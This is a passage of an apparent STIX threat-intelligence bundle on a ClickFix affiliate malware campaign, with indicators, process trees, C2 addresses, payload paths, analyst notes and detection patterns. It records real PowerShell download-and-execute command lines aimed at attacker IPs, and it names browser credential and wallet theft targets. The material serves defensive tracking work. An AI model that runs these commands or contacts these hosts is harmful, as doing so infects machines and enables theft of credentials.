      ],
      "pattern": "[url:value MATCHES '^http://158\\.94\\.208\\.104/x7GkP2mQ9zL4/']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "donutloader",
        "c2-path",
        "payload",
        "bin",
        "affiliate-segmentation"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4f2242e3-e91c-4126-89cc-7dafd3d61804",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File hashes: OTX-enriched payload samples (5 SHA256 / 3 MD5)",
      "description": "Additional payload file hashes from OTX telemetry. MD5: 51b46342163ef37f5f41c269ffb337d3, 7c268bfab0653cdca45b4dc3c1ee0092, c43c4bfd2e1a44ef690e6801be2b4099. Likely correspond to .bin payloads from DonutLoader C2 path.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.'SHA-256' = '2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810' OR file:hashes.'SHA-256' = '2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896' OR file:hashes.'SHA-256' = '6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d' OR file:hashes.'SHA-256' = '88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9' OR file:hashes.'SHA-256' = '4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "file-hash",
        "payload",
        "otx-enriched",
        "donutloader"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--63c4cfc2-e5eb-4948-bece-eb46e4df89e7",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "DonutLoader payload naming suggests affiliate segmentation",
      "content": "DonutLoader C2 at 158.94.208.104/x7GkP2mQ9zL4/ hosts six payload variants with two distinct naming prefixes: 'my_' and 'student_'. Each prefix has three variants: _downloader.bin (stager), _l.bin (likely loader), _s.bin (likely shellcode/payload). This strongly supports the affiliate-market hypothesis: different payload sets served to different affiliates or campaign segments. The 'student' prefix may indicate a campaign targeting educational institutions or simply a second affiliate's payload set. Combined with the /jsrepo vs /teamrepo endpoint split and the sdntds.shop domain addition in V2, the infrastructure consistently shows multi-tenant design patterns consistent with a ClickFix-as-a-Service affiliate platform rather than a solo operator.\n\nAdditional domains from OTX (captioto.com, cptoptious.com, newtdsone.shop) confirm the cluster operates a larger TDS domain pool than the three domains visible in the analyzed JS samples alone \u2014 further evidence of platform-scale infrastructure.",
      "object_refs": [
        "indicator--7217d17c-3685-4973-a493-b5d4f3f921e9"
      ]
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--590a76b0-7501-4381-aa13-d17cdc284f78",
      "pid": 7408,
      "name": "powershell.exe",
      "command_line": "Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null",
      "is_hidden": false,
      "extensions": {
        "windows-process-ext": {
          "integrity_level": "Medium"
        }
      }
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--871eceb3-7924-47a2-8a21-ea6150efb5a2",
      "pid": 4908,
      "name": "powershell.exe",
      "command_line": "Invoke-WebRequest http://158.94.208.92; Invoke-Expression $checkResult.Content",
      "is_hidden": false,
      "parent_ref": "process--590a76b0-7501-4381-aa13-d17cdc284f78"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--53c85b31-f98a-45c6-b662-18fb9f681f21",
      "pid": 7556,
      "name": "csc.exe",
      "command_line": "csc.exe /t:library /out:%TEMP%\\tr0oowwq.dll %TEMP%\\tr0oowwq.cmdline",
      "is_hidden": false,
      "parent_ref": "process--871eceb3-7924-47a2-8a21-ea6150efb5a2"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--941cb6b8-04d8-476f-af10-e77c57f01ca7",
      "name": "svchost.exe",
      "command_line": "svchost.exe [injected \u2014 TR/Rozena.Gen via WriteProcessMemory+CreateRemoteThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--9da22fa6-69c4-47a2-a294-83358ef5f9d2",
      "name": "chrome.exe",
      "command_line": "chrome.exe [injected \u2014 credential harvester via WriteProcessMemory+CreateRemoteThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--4bea18b3-b9a3-4879-a036-41db052de2f4",
      "name": "cmd.exe",
      "command_line": "cmd.exe /C ping 1.0.0.1 & del svchost.exe",
      "is_hidden": false,
      "parent_ref": "process--941cb6b8-04d8-476f-af10-e77c57f01ca7"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--ca931dad-6efe-4553-b058-0e7d47f62033",
      "name": "wscript.exe",
      "command_line": "wscript.exe payload.js",
      "is_hidden": false
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--5e0af509-82c1-44bd-9281-3dd3e034a870",
      "name": "rundll32.exe",
      "command_line": "rundll32.exe shell32.dll,ShellExec_RunDLL",
      "is_hidden": false,
      "parent_ref": "process--ca931dad-6efe-4553-b058-0e7d47f62033"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--e7dee33f-2980-490d-8621-e1802e0e2586",
      "name": "powershell.exe",
      "command_line": "powershell.exe -EncodedCommand [Base64: downloads python312x64.zip from filemail.com]",
      "is_hidden": false,
      "parent_ref": "process--5e0af509-82c1-44bd-9281-3dd3e034a870"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--6a0b801c-9236-4b48-991f-6ff40fbe8827",
      "name": "pythonw.exe",
      "command_line": "pythonw.exe Protected.py",
      "is_hidden": true,
      "parent_ref": "process--e7dee33f-2980-490d-8621-e1802e0e2586"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--7ce8c822-5f65-44f0-a207-9aad138f1420",
      "pid": 1752,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py via NtMapViewOfSection+NtSetContextThread]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--742ba999-1e41-4f52-b169-c5ad60196d94",
      "pid": 3152,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py instance 2]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--5cfccef0-7fc4-4f70-b616-268c774f0b73",
      "pid": 5032,
      "name": "wab.exe",
      "command_line": "wab.exe [injected \u2014 Protected.py instance 3]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--23f1d410-05b7-43f1-985b-6700240707c1",
      "name": "powershell.exe",
      "command_line": "SyncAppvPublishingServer.vbs [LOLBin \u2192 hidden powershell.exe \u2192 pythonw.exe Protected.py]",
      "is_hidden": true,
      "parent_ref": "process--ca931dad-6efe-4553-b058-0e7d47f62033"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
      "name": "powershell.exe",
      "command_line": "powershell iex(irm('91.92.240.117'))",
      "is_hidden": false
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
      "name": "powershell.exe",
      "command_line": "powershell Invoke-WebRequest http://91.92.240.121; Invoke-Expression $result.Content",
      "is_hidden": false,
      "parent_ref": "process--ff773823-abbd-4b42-b33f-0302f37dae1f"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e",
      "name": "csc.exe",
      "command_line": "csc.exe /t:library /out:%TEMP%\\dwqlmpkj.dll %TEMP%\\dwqlmpkj.cmdline",
      "is_hidden": false,
      "parent_ref": "process--cf2b9712-adf4-4636-82c1-fd62dc53f765"
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
      "name": "svchost.exe",
      "command_line": "svchost.exe [injected \u2014 dwqlmpkj.dll via DonutLoader, fetches student_s.bin + student_l.bin]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--3dbfa4a7-5ecf-417d-87da-296c9372c50a",
      "name": "chrome.exe",
      "command_line": "chrome.exe [injected \u2014 Chrome cookies/history harvest]",
      "is_hidden": true
    },
    {
      "type": "process",
      "spec_version": "2.1",
      "id": "process--1eb06df6-4b5f-41b2-8a7e-cb36626b0d99",
      "name": "cmd.exe",
      "command_line": "cmd.exe /C ping 1.0.0.1 & del svchost.exe",
      "is_hidden": false,
      "parent_ref": "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--39edc8f7-94a9-4072-aeb7-ee6500fe63fb",
      "name": "tr0oowwq.dll",
      "parent_directory_ref": "directory--c69d1bcb-c134-48e2-9fbe-72059d8a17a4",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--a87058b1-11de-4028-92c6-1b6f7517cd24",
      "name": "tr0oowwq.cmdline"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--617572d2-0242-4370-8302-10d0cb8c4e19",
      "name": "dwqlmpkj.dll",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--31d516ff-33a0-4474-b293-2ab9503130cc",
      "name": "dwqlmpkj.cmdline"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--5deb91ed-e003-451b-9a79-df8eb36bbd65",
      "name": "student_s.bin"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--f050a904-eb91-4728-83f8-cf90e2fd5bef",
      "name": "student_l.bin"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--61e3fe1d-c51f-4a53-a10e-ac0c3685aae5",
      "name": "Protected.py"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--7d255c91-1fff-4502-ab8e-fb1c90ad414b",
      "name": "python312x64.zip"
    },
    {
      "type": "file",
      "spec_version": "2.1",
      "id": "file--8411a84c-7d3b-4d69-9ab9-dfec21df8348",
      "name": "wc*.tmp",
      "extensions": {
        "windows-pebinary-ext": {
          "file_header_hashes": {}
        }
      }
    },
    {
      "type": "ipv4-addr",
      "spec_version": "2.1",
      "id": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "value": "158.94.208.104"
    },
    {
      "type": "network-traffic",
      "spec_version": "2.1",
      "id": "network-traffic--ca16c5f4-e143-4e8c-a372-f459bc36ebda",
      "dst_ref": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "dst_port": 80,
      "protocols": [
        "http"
      ],
      "extensions": {
        "http-request-ext": {
          "request_method": "GET",
          "request_value": "/x7GkP2mQ9zL4/student_s.bin"
        }
      }
    },
    {
      "type": "network-traffic",
      "spec_version": "2.1",
      "id": "network-traffic--5e0c013a-a09f-4f65-9868-69fcf0481b34",
      "dst_ref": "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
      "dst_port": 80,
      "protocols": [
        "http"
      ],
      "extensions": {
        "http-request-ext": {
          "request_method": "GET",
          "request_value": "/x7GkP2mQ9zL4/student_l.bin"
        }
      }
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--d255af9b-affa-4662-9628-876708c3b978",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--590a76b0-7501-4381-aa13-d17cdc284f78",
        "process--871eceb3-7924-47a2-8a21-ea6150efb5a2",
        "process--53c85b31-f98a-45c6-b662-18fb9f681f21"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--fd5bf982-8ece-476e-b129-077419443782",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--941cb6b8-04d8-476f-af10-e77c57f01ca7",
        "process--9da22fa6-69c4-47a2-a294-83358ef5f9d2",
        "process--4bea18b3-b9a3-4879-a036-41db052de2f4"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--1d95e8a8-fc3f-47a5-ba88-078910037938",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--ca931dad-6efe-4553-b058-0e7d47f62033",
        "process--5e0af509-82c1-44bd-9281-3dd3e034a870",
        "process--e7dee33f-2980-490d-8621-e1802e0e2586",
        "process--6a0b801c-9236-4b48-991f-6ff40fbe8827"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--69ee0923-f4ca-4b22-8663-6e53c9b15216",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--7ce8c822-5f65-44f0-a207-9aad138f1420",
        "process--742ba999-1e41-4f52-b169-c5ad60196d94",
        "process--5cfccef0-7fc4-4f70-b616-268c774f0b73"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--1e400f18-0cd6-4cf0-a76f-05f936a642c3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--ff773823-abbd-4b42-b33f-0302f37dae1f",
        "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
        "process--b12d60ee-5fa0-4c08-adb8-09585ed2ee5e"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--c327e1b9-886b-441e-94d4-65e271054712",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "process--fa818c68-3da4-4053-8cfd-4fb88482a0c8",
        "process--3dbfa4a7-5ecf-417d-87da-296c9372c50a",
        "process--1eb06df6-4b5f-41b2-8a7e-cb36626b0d99"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--e6872478-9b30-4081-bb40-f67f3637cf87",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "ipv4-addr--7ea48b3e-369f-4524-82e6-d5b512fd19ef",
        "network-traffic--ca16c5f4-e143-4e8c-a372-f459bc36ebda",
        "network-traffic--5e0c013a-a09f-4f65-9868-69fcf0481b34"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--0a7c3c5d-7138-48c4-ab9f-66964b20ab5a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "file--617572d2-0242-4370-8302-10d0cb8c4e19",
        "file--31d516ff-33a0-4474-b293-2ab9503130cc",
        "file--5deb91ed-e003-451b-9a79-df8eb36bbd65",
        "file--f050a904-eb91-4728-83f8-cf90e2fd5bef"
      ]
    },
    {
      "type": "observed-data",
      "spec_version": "2.1",
      "id": "observed-data--db49abef-8b91-42de-843f-bc622cc241c1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "first_observed": "2026-05-01T00:00:00Z",
      "last_observed": "2026-05-19T00:00:00Z",
      "number_observed": 1,
      "object_refs": [
        "file--39edc8f7-94a9-4072-aeb7-ee6500fe63fb",
        "file--a87058b1-11de-4028-92c6-1b6f7517cd24",
        "file--61e3fe1d-c51f-4a53-a10e-ac0c3685aae5",
        "file--7d255c91-1fff-4502-ab8e-fb1c90ad414b",
        "file--8411a84c-7d3b-4d69-9ab9-dfec21df8348"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4ad3bb0b-98e6-4b68-8940-60b50e15d410",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File: dwqlmpkj.dll / dwqlmpkj.cmdline \u2014 Bryan campaign Rozena DLL",
      "description": "Randomized DLL name compiled by csc.exe in Bryan campaign. Equivalent of tr0oowwq.dll in V1 chain. Confirms DLL name is randomized per campaign.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'dwqlmpkj.dll' OR file:name = 'dwqlmpkj.cmdline']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "rozena",
        "csc-compiled",
        "bryan-campaign",
        "randomized-dll"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7f56fc75-17b4-463c-8d51-6cea59fb9c67",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "PS command: iex(irm('91.92.240.117')) \u2014 Bryan campaign stage 1",
      "description": "Bryan campaign PowerShell stage 1. Uses 91.92.240.117 instead of 178.16.52.232. Different C2 per affiliate/campaign confirms multi-tenant infrastructure.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[process:command_line MATCHES 'iex.*irm.*91\\.92\\.240\\.117']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage1",
        "bryan-campaign",
        "91.92.240.117"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17945ceb-5351-4271-b5fb-0dc1262db963",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: URL filter \u2014 skip .php/.txt/sitemap.xml/robots.txt (Bryan loader variant)",
      "description": "Bryan chain loader checks window.location.href against /\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt/i before firing XHR. Avoids triggering on admin pages, sitemaps, bot requests. Not present in V1 loader \u2014 added between V1 and Bryan build.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "url-filter",
        "evasion",
        "bot-avoidance",
        "bryan-variant"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: Dual cache-buster Math.random() + Date.now() (Bryan loader)",
      "description": "Bryan loader appends both Math.random() AND Date.now() to TDS URL for cache-busting. V1/V3/V4 use Math.random() only. Stronger cache bypass.",
      "indicator_types": [
        "anomalous-activity"
      ],
      "pattern": "[url:value MATCHES 'teamrepo\\?rnd=.*&ts=']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "cache-buster",
        "date-now",
        "bryan-variant",
        "tds-evasion"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0c18e504-9a50-4da5-8acc-e954c9224b94",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Behaviour: navigator.userAgent fingerprinting in loader (Bryan variant)",
      "description": "Bryan loader reads navigator.userAgent before firing TDS XHR. Likely used to filter non-browser/bot requests or target specific UA patterns.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'navigator\\[userAgent\\]|navigator\\.userAgent']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "useragent-fingerprint",
        "browser-filter",
        "bryan-variant"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fce050a1-6f2e-4d5a-9168-a77515118121",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "File access: Firefox places.sqlite \u2014 Bryan chain credential theft",
      "description": "Bryan chain accesses Firefox places.sqlite (browsing history + bookmarks DB). Original V1 chain targeted Firefox key4.db (password store). Bryan chain targets places.sqlite \u2014 different Firefox artifact, different data.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'places.sqlite']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "firefox",
        "places.sqlite",
        "credential-theft",
        "bryan-campaign"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "ClickFix PowerShell Dropper \u2014 Bryan Campaign (91.92.240.117/121)",
      "description": "Bryan campaign variant of the ClickFix PowerShell dropper. Served by sdntds.shop/teamrepo (V2 TDS endpoint). Stage 1: iex(irm('91.92.240.117')) \u2014 different C2 from V1 (178.16.52.232). Stage 2: IWR 91.92.240.121 \u2014 different C2 from V1 (158.94.208.92). Compiles dwqlmpkj.dll (vs tr0oowwq.dll in V1 \u2014 randomized name per campaign). DonutLoader fetches student_s.bin + student_l.bin (affiliate 'student' segment). Credentials: Chrome cookies/history + Firefox places.sqlite (vs key4.db in V1). No parallel Python/wab.exe chain documented in this variant. Distinct C2s confirm per-affiliate infrastructure assignment.",
      "malware_types": [
        "dropper",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "clickfix",
        "powershell",
        "bryan-campaign",
        "91.92.240.117",
        "student-segment"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "process-injection",
        "credential-theft",
        "self-deletion"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--6602261d-b993-479b-9fc1-d15e082d751a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "SL-ADV-007-BRYAN: bryanexhaust.com affiliate campaign",
      "description": "Bryan campaign \u2014 a distinct affiliate instance of the SL-ADV-007 TDS cluster. Uses sdntds.shop/teamrepo TDS endpoint (V2 infrastructure). Loader variant adds userAgent fingerprinting, URL filter (.php/.txt/sitemap/robots), and dual cache-buster (Math.random() + Date.now()). PS chain uses dedicated IPs: 91.92.240.117 (stage1), 91.92.240.121 (stage2). DonutLoader fetches 'student' payload set: student_s.bin + student_l.bin. DLL name randomized: dwqlmpkj.dll. Linked to bryanexhaust.com domain. Confirms affiliate-market hypothesis: separate C2s, separate payload segment, separate DLL name, same shared TDS/DonutLoader backend infrastructure.",
      "first_seen": "2026-05-01T00:00:00Z",
      "last_seen": "2026-05-19T00:00:00.000Z",
      "labels": [
        "clickfix",
        "tds",
        "bryan",
        "affiliate",
        "student-segment",
        "sdntds"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--f8d4b7b5-6316-4b5b-8b52-0e887b1ff176",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "abstract": "Two callchain comparison \u2014 V1 original vs Bryan affiliate campaign",
      "content": "Two distinct Windows-stage attack chains documented, sharing backend infrastructure:\n\nORIGINAL CHAIN (V1 / SL-ADV-007):\n  TDS: ntdnewtds.shop/jsrepo or dnsnewtds.shop/jsrepo\n  PS Stage1: 178.16.52.232\n  PS Stage2: 158.94.208.92\n  DLL: tr0oowwq.dll (TR/Rozena.Gen)\n  DonutLoader C2: 158.94.208.104:80 (generic payload path)\n  Credential targets: Chrome History/Cookies, Firefox key4.db, Electrum, Jaxx\n  Parallel chain: payload.js \u2192 WScript \u2192 rundll32 \u2192 PS \u2192 filemail \u2192 Protected.py \u2192 wab.exe\n  Cache-buster: Math.random() only\n  URL filter: none\n  UA fingerprint: none\n\nBRYAN CHAIN (bryanexhaust.com affiliate):\n  TDS: sdntds.shop/teamrepo (V2 endpoint)\n  PS Stage1: 91.92.240.117 (dedicated affiliate C2)\n  PS Stage2: 91.92.240.121 (dedicated affiliate C2)\n  DLL: dwqlmpkj.dll (same function, randomized name)\n  DonutLoader: student_s.bin + student_l.bin from 158.94.208.104/x7GkP2mQ9zL4/\n  Credential targets: Chrome cookies/history, Firefox places.sqlite\n  No parallel Python chain\n  Cache-buster: Math.random() + Date.now() (stronger)\n  URL filter: /\\.php|\\.txt|sitemap.*\\.xml|robots\\.txt/i (bot avoidance)\n  UA fingerprint: navigator.userAgent read before XHR\n\nSHARED INFRASTRUCTURE:\n  DonutLoader C2: 158.94.208.104 (same host, different payload paths)\n  Same RC4+Base64 obfuscation cipher\n  Same window.__performance_optimizer_v6 guard\n  Same createElement/script.text/head.appendChild injection sink\n\nINTERPRETATION:\n  The Bryan chain is an affiliate instance. Dedicated C2 IPs (91.92.240.117/121) and 'student' payload segment on shared DonutLoader infrastructure confirm per-affiliate resource allocation within a ClickFix-as-a-Service platform. The loader hardening (UA fingerprint, URL filter, dual cache-buster) may reflect affiliate-specific configuration or a later platform version.",
      "object_refs": [
        "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
        "campaign--6602261d-b993-479b-9fc1-d15e082d751a"
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--437f40ff-29c1-4027-bed3-6e3c7cee05c5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "description": "Bryan affiliate campaign PS dropper"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ccfa633e-33e4-4fb7-b749-2d5fc9afc050",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "campaign--6602261d-b993-479b-9fc1-d15e082d751a"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--610fa698-f978-4f0c-a327-adc1ca4b14a5",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--6602261d-b993-479b-9fc1-d15e082d751a",
      "target_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7bb15a7f-6147-4b51-bcfc-193c32a546b3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--937bb209-fd7c-481a-9c76-736cf14c8813",
      "description": "PS Stage1 C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d04a952-0f9a-4581-abd6-763d9e633fa2",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--a8742037-1ec8-433c-a173-1666c3e92b71",
      "description": "PS Stage2 C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79c8f6d4-21f9-41d1-96a5-e4f739861d1a",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11",
      "description": "DonutLoader C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6bc3b3a1-1d52-44e1-afe4-4afbc4a41b91",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "drops",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "Compiles dwqlmpkj.dll (Rozena variant)"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c1ff019-dec2-4fa7-b8bc-d53978542fcc",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--133f327b-f2b4-4a57-af99-1e64fe5484a9",
